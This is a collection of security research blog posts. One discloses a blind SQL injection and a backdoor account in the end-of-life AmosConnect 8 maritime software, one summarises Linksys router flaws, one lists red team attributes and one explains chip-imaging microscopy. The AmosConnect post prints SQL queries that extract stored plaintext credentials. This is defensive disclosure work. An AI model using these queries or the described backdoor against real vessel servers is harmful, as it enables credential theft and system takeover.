RESEARCH | October 26, 2017

AmosConnect: Maritime Communications Security Has Its Flaws

Satellite communications security has been a target of our research for some time: in 2014 IOActive released a document detailing many vulnerabilities in popular SATCOM systems. Since then we’ve had the opportunity to dive deeper in this area, and learned a lot more about some of the environments in which these systems are in place.

Recently, we saw that Shodan released a new tool that tracks the location of VSAT systems exposed to the Internet. These systems are typically installed in vessels to provide them with internet connectivity while at open sea.


The maritime sector makes use of some of these systems to track and monitor ships’ IT and navigation systems as well as to aid crew members in some of their daily duties, providing them with e-mail or the ability to browse the Internet. Modern vessels don’t differ that much from your typical office these days, aside from the fact that they might be floating in a remote location.

Satellite connectivity is an expensive resource. In order to minimize its cost, several products exist to perform optimizations around the compression of data while in transit. One of the products that caught our eye was AmosConnect.

AmosConnect 8 is a platform designed to work in a maritime environment in conjunction with satellite equipment, providing services such as: 

  • E-mail
  • Instant messaging
  • Position reporting
  • Crew Internet
  • Automatic file transfer
  • Application integration


We have identified two critical vulnerabilities in this software that allow pre-authenticated attackers to fully compromise an AmosConnect server. We have reported these vulnerabilities but there is no fix for them, as Inmarsat has discontinued AmosConnect 8, announcing its end-of-life in June 2017. The original advisory is available here, and this blog post will also discuss some of the technical details.

 

Blind SQL Injection in Login Form
A Blind SQL Injection vulnerability is present in the login form, allowing unauthenticated attackers to gain access to credentials stored in its internal database. The server stores usernames and passwords in plaintext, making this vulnerability trivial to exploit.

The following POST request is sent when a user tries to log into AmosConnect


The parameter data[MailUser][emailAddress] is vulnerable to Blind SQL Injection, enabling data retrieval from the backend SQLite database using time-based attacks.

Attackers that successfully exploit this vulnerability can retrieve credentials to log into the service by executing the following queries:

SELECT key, value from MOBILE_PROPS WHERE key LIKE ‘USER.%.password’;

SELECT key, value from MOBILE_PROPS WHERE key LIKE 

‘USER.%.email_address’;

The authentication method is implemented in mail_user.php:

The call to findByEmail() instantiates a COM object that is implemented in native C++ code.

 

The following C++ native methods are invoked upon execution of the call:
     Neptune::UserManager::User::findByEmai(…)
          Neptune::ConfigManager::Property::findBy( … )
               Neptune::ConfigManager::Property::findAllBy( … )
The vulnerable code is implemented in Neptune::ConfigManager::Property::findAllBy() as seen below:

 

 

Strings are concatenated in an insecure manner, building a SQL query that in this case would look like:
“[…] deleted = 0 AND key like ‘USER.%.email_address’ AND upper(value) like ‘{email}'”

 

Privileged Backdoor Account

The AmosConnect server features a built-in backdoor account with full system privileges. Among other things, this vulnerability allows attackers to execute commands with SYSTEM privileges on the remote system by abusing AmosConnect Task Manager.
 
Users accessing the AmosConnect server see the following login screen:
 
The login website reveals the Post Office ID, this ID identifies the AmosConnect server and is tied to the software license.
 
The following code belongs to the authentication method implemented in mail_user.php. Note the call to authenticateBackdoorUser():
 
authenticateBackdoorUser() is implemented as follows:
 
 
The following code snippet shows how an attacker can obtain the SysAdmin password for a given Post Office ID:
Conclusions and thoughts
Vessel networks are typically segmented and isolated from each other, in part for security reasons. A typical vessel network configuration might feature some of the following subnets:
·         Navigation systems network. Some of the most recent vessels feature “sail-by-wire” technologies; the systems in charge of providing this technology are located in this network.
·         Industrial Control Systems (ICS) network. Vessels contain a lot of industrial machinery that can be remotely monitored and operated. Some vessels feature a dedicated network for these systems; in some configuration, the ICS and Navigation networks may actually be the same.
·         IT systems network. Vessels typically feature a separate network to support office applications. IT servers and crew members’ work computers are connected to this network; its within this network that AmosConnect is typically deployed.
·         Bring-Your-Own-Device networks. Vessels may feature a separate network to provide internet connectivity to guests or crew members personal devices.
·         SATCOM. While this may change from vessel to vessel, some use a separate subnet to host satellite communications equipment.
While the vulnerabilities discussed in this blog post may only be exploited by an attacker with access to the IT systems network, its important to note that within certain vessel configurations some networks might not be segmented, or AmosConnect might be exposed to one or more of these networks. A typical scenario would make AmosConnect available to both the BYOD “guest and IT networks; one can easily see how these vulnerabilities could be exploited by a local attacker to pivot from the guest network to the IT network. Also, some the vulnerabilities uncovered during our SATCOM research might enable attackers to access these systems via the satellite link.
 
All in all, these vulnerabilities pose a serious security risk. Attackers might be able to obtain corporate data, take over the server to mount further attacks or pivot within the vessel networks.
References:
https://shiptracker.shodan.io/
RESEARCH | April 20, 2017

Linksys Smart Wi-Fi Vulnerabilities

By Tao Sauvage

Last year I acquired a Linksys Smart Wi-Fi router, more specifically the EA3500 Series. I chose Linksys (previously owned by Cisco and currently owned by Belkin) due to its popularity and I thought that it would be interesting to have a look at a router heavily marketed outside of Asia, hoping to have different results than with my previous research on the BHU Wi-Fi uRouter, which is only distributed in China.

Smart Wi-Fi is the latest family of Linksys routers and includes more than 20 different models that use the latest 802.11N and 802.11AC standards. Even though they can be remotely managed from the Internet using the Linksys Smart Wi-Fi free service, we focused our research on the router itself.

Figure 1: Linksys EA3500 Series UART connection

With my friend @xarkes_, a security aficionado, we decided to analyze the firmware (i.e., the software installed on the router) in order to assess the security of the device. The technical details of our research will be published soon after Linksys releases a patch that addresses the issues we discovered, to ensure that all users with affected devices have enough time to upgrade.

In the meantime, we are providing an overview of our results, as well as key metrics to evaluate the overall impact of the vulnerabilities identified.

Security Vulnerabilities

After reverse engineering the router firmware, we identified a total of 10 security vulnerabilities, ranging from low- to high-risk issues, six of which can be exploited remotely by unauthenticated attackers.

Two of the security issues we identified allow unauthenticated attackers to create a Denial-of-Service (DoS) condition on the router. By sending a few requests or abusing a specific API, the router becomes unresponsive and even reboots. The Admin is then unable to access the web admin interface and users are unable to connect until the attacker stops the DoS attack.

Attackers can also bypass the authentication protecting the CGI scripts to collect technical and sensitive information about the router, such as the firmware version and Linux kernel version, the list of running processes, the list of connected USB devices, or the WPS pin for the Wi-Fi connection. Unauthenticated attackers can also harvest sensitive information, for instance using a set of APIs to list all connected devices and their respective operating systems, access the firewall configuration, read the FTP configuration settings, or extract the SMB server settings.

Finally, authenticated attackers can inject and execute commands on the operating system of the router with root privileges. One possible action for the attacker is to create backdoor accounts and gain persistent access to the router. Backdoor accounts would not be shown on the web admin interface and could not be removed using the Admin account. It should be noted that we did not find a way to bypass the authentication protecting the vulnerable API; this authentication is different than the authentication protecting the CGI scripts.

Linksys has provided a list of all affected models:

  • EA2700
  • EA2750
  • EA3500
  • EA4500v3
  • EA6100
  • EA6200
  • EA6300
  • EA6350v2
  • EA6350v3
  • EA6400
  • EA6500
  • EA6700
  • EA6900
  • EA7300
  • EA7400
  • EA7500
  • EA8300
  • EA8500
  • EA9200
  • EA9400
  • EA9500
  • WRT1200AC
  • WRT1900AC
  • WRT1900ACS
  • WRT3200ACM

Cooperative Disclosure
We disclosed the vulnerabilities and shared the technical details with Linksys in January 2017. Since then, we have been in constant communication with the vendor to validate the issues, evaluate the impact, and synchronize our respective disclosures.

We would like to emphasize that Linksys has been exemplary in handling the disclosure and we are happy to say they are taking security very seriously.

We acknowledge the challenge of reaching out to the end-users with security fixes when dealing with embedded devices. This is why Linksys is proactively publishing a security advisory to provide temporary solutions to prevent attackers from exploiting the security vulnerabilities we identified, until a new firmware version is available for all affected models.

Metrics and Impact 

As of now, we can already safely evaluate the impact of such vulnerabilities on Linksys Smart Wi-Fi routers. We used Shodan to identify vulnerable devices currently exposed on the Internet.

 

 

Figure 2: Repartition of vulnerable Linksys routers per country

We found about 7,000 vulnerable devices exposed at the time of the search. It should be noted that this number does not take into account vulnerable devices protected by strict firewall rules or running behind another network appliance, which could still be compromised by attackers who have access to the individual or company’s internal network.

A vast majority of the vulnerable devices (~69%) are located in the USA and the remainder are spread across the world, including Canada (~10%), Hong Kong (~1.8%), Chile (~1.5%), and the Netherlands (~1.4%). Venezuela, Argentina, Russia, Sweden, Norway, China, India, UK, Australia, and many other countries representing < 1% each.

We performed a mass-scan of the ~7,000 devices to identify the affected models. In addition, we tweaked our scan to find how many devices would be vulnerable to the OS command injection that requires the attacker to be authenticated. We leveraged a router API to determine if the router was using default credentials without having to actually authenticate.

We found that 11% of the ~7000 exposed devices were using default credentials and therefore could be rooted by attackers.

Recommendations

We advise Linksys Smart Wi-Fi users to carefully read the security advisory published by Linksys to protect themselves until a new firmware version is available. We also recommend users change the default password of the Admin account to protect the web admin interface.

Timeline Overview

  • January 17, 2017: IOActive sends a vulnerability report to Linksys with findings 
  • January 17, 2017: Linksys acknowledges receipt of the information
  • January 19, 2017: IOActive communicates its obligation to publicly disclose the issue within three months of reporting the vulnerabilities to Linksys, for the security of users
  • January 23, 2017: Linksys acknowledges IOActive’s intent to publish and timeline; requests notification prior to public disclosure
  • March 22, 2017: Linksys proposes release of a customer advisory with recommendations for  protection
  • March 23, 2017: IOActive agrees to Linksys proposal
  • March 24, 2017: Linksys confirms the list of vulnerable routers
  • April 20, 2017: Linksys releases an advisory with recommendations and IOActive publishes findings in a public blog post
INSIGHTS | September 1, 2016

Five Attributes of an Effective Corporate Red Team

After talking recently with colleagues at IOActive as well as some heads of industry-leading red teams, we wanted to share a list of attributes that we believe are key to any effective Red Team.

[ NOTE: For debate about the relevant terminology, we suggest Daniel’s post titled The Difference Between Red, Blue, and Purple Teams. ]

To be clear, we think there can be significant variance in how Red Teams are built and managed, and we believe there are likely multiple routes to success. But we believe there are a few key attributes that all (or at least most) corporate Red Teams should have as part of their program. These are:

  1. Organizational Independence
  2. Defensive Coordination
  3. Continuous Operation
  4. Adversary Emulation
  5. Efficacy Measurement

Let’s look at each of these.

Organizational Independence is the requirement that the Red Team be able to effectively act as a real-world attacker in terms of scope, tools, and techniques employed. Many organizations restrict their Red Teams to such a degree that they’re basically impotent, which in turn lulls the company into a false sense of security.

Defensive Coordination is the requirement that Red Teams regularly interact with their counterparts on the defensive side to ensure the organization is learning from their activities. If a Red Team is effective on its own, but doesn’t share its knowledge and successes with the defense in order make it stronger, then the Red Team has lost sight of its purpose.

Continuous Operation is the requirement that the organization remain under constant, rolling attack by the Red Team, which is the polar opposite of short, penetration-test style engagements. Red Teams should operate through campaigns that span weeks or months in duration, and both the defensive teams and the general user population should know that at any moment, of any day, they could be targeted by both a Red Team campaign of some sort, or by a real attacker.

Adversary Emulation is the requirement that Red Team campaigns should be regularly updated based on the actual tools, techniques, and processes employed by real-world attackers. If cyber-criminals are doing X this quarter, let’s emulate that. If we’re seeing some state actors doing Y this year, let’s emulate that. If you’re not simulating—to some significant degree—the techniques being used by actual attackers, the Red Team is providing questionable value.

Efficacy Measurement is the requirement that Red Teams know how effective they are at improving the security posture of the organization. If we can’t tell a clear story around how our defenses are improving, i.e., that it’s getting increasingly more difficult to compromise, move laterally, and achieve attacker goals, then you’re getting limited value from any work that’s being done.

Summary

Here’s a pointed capture of those points:

  • If your group is significantly restricted in its scope and capabilities by the organization, you probably don’t have an effective Red Team
  • If your group doesn’t regularly work hand-in-hand with the defensive side of the organization in order to improve the organization’s security posture, you probably don’t have an effective Red Team
  • If your internal or external service operates based on projects that happen once in a while rather than being staggered and continuous, you probably don’t have an effective Red Team
  • If you aren’t constantly updating your attack campaigns based on new intelligence on actual threat actors, you probably don’t have an effective Red Team
  • If you aren’t closely monitoring the effectiveness of the attack campaigns (and the responses to them by the defense) over time, you probably don’t have an effective Red Team

There are many other components of a solid Red Team that were not mentioned—top-end malware kits, elite security talent, deep understanding of the attacker mindset, etc.—but we think these five components are both most fundamental and most lacking.

As always, we would love to hear from other security types who might have a differing opinion. All of our positions are subject to change through exposure to compelling arguments and/or data.
INSIGHTS | March 22, 2016

Inside the IOActive Silicon Lab: Interpreting Images

In the post “Reading CMOS layout,” we discussed understanding CMOS layout in order to reverse-engineer photographs of a circuit to a transistor-level schematic. This was all well and good, but I glossed over an important (and often overlooked) part of the process: using the photos to observe and understand the circuit’s actual geometry.


Optical Microscopy

Let’s start with brightfield optical microscope imagery. (Darkfield microscopy is rarely used for semiconductor work.) Although reading lower metal layers on modern deep-submicron processes does usually require electron microscopy, optical microscopes still have their place in the reverse engineer’s toolbox. They are much easier to set up and run quickly, have a wider field of view at low magnifications, need less sophisticated sample preparation, and provide real-time full-color imagery. An optical microscope can also see through glass insulators, allowing inspection of some underlying structures without needing to deprocess the device.
 
This can be both a blessing and a curse. If you can see underlying structures in upper-layer images, it can be much easier to align views of different layers. But it can also be much harder to tell what you’re actually looking at! Luckily, another effect comes to the rescue – depth of field.


Depth of field

When using an objective with 40x power or higher, a typical optical microscope has a useful focal plane of less than 1 µm. This means that it is critical to keep the sample stage extremely flat – a slope of only 100 nm per mm (0.005 degrees) can result in one side of a 10x10mm die being in razor-sharp focus while the other side is blurred beyond recognition.
 
In the image below (from a Micrel KSZ9021RN gigabit Ethernet PHY) the top layer is in sharp focus but all of the features below are blurred—the deeper the layer, the less easy it is to see.
We as reverse engineers can use this to our advantage. By sweeping the focus up or down, we can get a qualitative feel for which wires are above, below, or on the same layer as other wires. Although it can be useful in still photos, the effect is most intuitively understood when looking through the eyepiece and adjusting the focus knob by hand. Compare the previous image to this one, with the focal plane shifted to one of the lower metal layers.
I also find that it’s sometimes beneficial to image a multi-layer IC using a higher magnification than strictly necessary, in order to deliberately limit the depth of field and blur out other wiring layers. This can provide a cleaner, more easily understood image, even if the additional resolution isn’t necessary.


Color

Another important piece of information the optical microscope provides is color.  The color of a feature under an optical microscope is typically dependent on three factors:
  •       Material color
  •        Orientation of the surface relative to incident light
  •        Thickness of the glass/transparent material over it

 
Material color is the easiest to understand. A flat, smooth surface of a substance with nothing on top will have the same color as the bulk material. The octagonal bond pads in the image below (a Xilinx XC3S50A FPGA), for example, are made of bare aluminum and show up as a smooth silvery color, just as one would expect. Unfortunately, most materials used in integrated circuits are either silvery (silicon, polysilicon, aluminum, tungsten) or clear (silicon dioxide or nitride). Copper is the lone exception.
 
Orientation is another factor to consider. If a feature is tilted relative to the incident light, it will be less brightly lit. The dark squares in the image below are vias in the upper metal layer which go down to the next layer; the “sag” in the top layer is not filled in this process so the resulting slopes show up as darker. This makes topography visible on an otherwise featureless surface.
The third property affecting observed color of a feature is the glass thickness above it. When light hits a reflective surface under a transparent, reflective surface, some of the beam bounces off the lower surface and some bounces off the top of the glass. The two beams interfere with each other, producing constructive and destructive interference at wavelengths equal to multiples of the glass thickness.
 
This is the same effect responsible for the colors seen in a film of oil floating on a puddle of water–the reflections from the oil’s surface and the oil-water interface interfere. Since the oil film is not exactly the same thickness across the entire puddle, the observed colors vary slightly. In the image above, the clear silicon nitride passivation is uniform in thickness, so the top layer wiring (aluminum, mostly for power distribution) shows up as a uniform tannish color. The next layer down has more glass over it and shows up as a slightly different pink color.
 
Compare that to the image below (an Altera EPM3064A CPLD). The thickness of the top passivation layer varies significantly across the die surface, resulting in rainbow-colored fringes.
 

Electron Microscopy

The scanning electron microscope is the preferred tool for imaging finer pitch features (below about 250 nm). Due to the smaller wavelength of electron beams as compared to visible light, this tool can obtain significantly higher resolutions.
 
The basic operating principle of a SEM is similar to an old-fashioned CRT display: electromagnets move a beam of electrons in a vacuum chamber in a raster-scan pattern over the sample. At each pixel, the beam interacts with the sample, producing several forms of radiation that the microscope can detect and use for imaging.
 
Electron microscopy in general has an extremely high depth of field, making it very useful for imaging 3D structures. The image below (copper bond wires on a Microchip PIC12F683) has about the same field of view as the optical images from the beginning of this article, but even from a tilted perspective the entire loop of wire is in sharp focus.
 
 

Secondary Electron Images

The most common general-purpose image detector for the SEM is the secondary electron detector. When a high-energy electron from the scanning beam grazes an atom in the sample, it sometimes dislodges an electron from the outer shell. Secondary electrons have very low energy, and will slow to a stop after traveling a fairly short distance. As a result, only those generated very near the surface of the sample will escape and be detected.
 
This makes secondary electron images very sensitive to topography. Outside edges, tilted surfaces, and small point features (dust and particulates) show up brighter than a flat surface because a high percentage of the secondary electrons are generated near exposed surfaces of the specimen. Inward-facing edges show up dimmer than a flat surface because a high percentage of the secondary electrons are absorbed in the material.
 
The general appearance of a secondary electron image is similar to a surface lit up with a floodlight. The eye position is that of the objective lens, and the “light source” appears to come from the position of the secondary electron detector.
 
In the image below (the polysilicon layer of a Microchip PIC12F683 before cleaning), the polysilicon word lines running horizontally across the memory array have bright edges, which shows that they are raised above the background. The diamond-shaped source/drain areas have dark “shadowed” edges, showing that they are lower than their surroundings (and thus many of the secondary electrons are being absorbed). The dust particles and loose tungsten via plugs scattered around the image show up very brightly because they have so much exposed surface area.
Compare the above SEM view to the optical image of the same area below. Note that the SEM image has much higher resolution, but the optical image reveals (through color changes) thickness variations in the glass layer that are not obvious in the SEM. This can be very helpful when trying to gauge progress or uniformity of an etch/polish operation.
In addition to the primary contrast mechanism discussed above, the efficiency of secondary electron emission is weakly dependent on the elemental composition of the material being observed. For example, at 20 kV the number of secondary electrons produced for a given beam current is about four times higher for tungsten than for silicon (see this paper). While this may lead to some visible contrast in a secondary electron image, if elemental information is desired, it would be preferable to use a less topography-sensitive imaging mode.
 

Backscattered Electron Images

Secondary electron imaging does not work well on flat specimens, such as a die that has been polished to remove upper metal layers or a cross section. Although it’s often possible to etch such a sample to produce topography for imaging in secondary electron mode, it’s usually easier to image the flat sample using backscatter mode.
 
When a high-energy beam electron directly impacts the nucleus of an atom in the sample, it will bounce back at high speed in the approximate direction it came from. The probability of such a “backscatter” event happening depends on the atomic number Z of the material being imaged. Since backscatters are very energetic, the surrounding material does not easily absorb them. As a result, the appearance of the resulting image is not significantly influenced by topography and contrast is primarily dependent on material (Z-contrast).
 
In the image below (cross section of a Xilinx XC2C32A CPLD), the silicon substrate (bottom, Z=14) shows up as a medium gray. The silicon dioxide insulator between the wires is darker due to the lower average atomic number (Z=8 for oxygen). The aluminum wires (Z=13) are about the same color as the silicon, but the titanium barrier layer (Z=22) above and below is significantly brighter. The tungsten vias (Z=74) are extremely bright white. Looking at the bottom right where the via plugs touch the silicon, a thin layer of cobalt (Z=27) silicide is visible.

Depending on the device you are analyzing, any or all of these three imaging techniques may be useful. Knowledge of the pros and cons of these techniques and the ability to interpret their results are key skills for the semiconductor reverse engineer.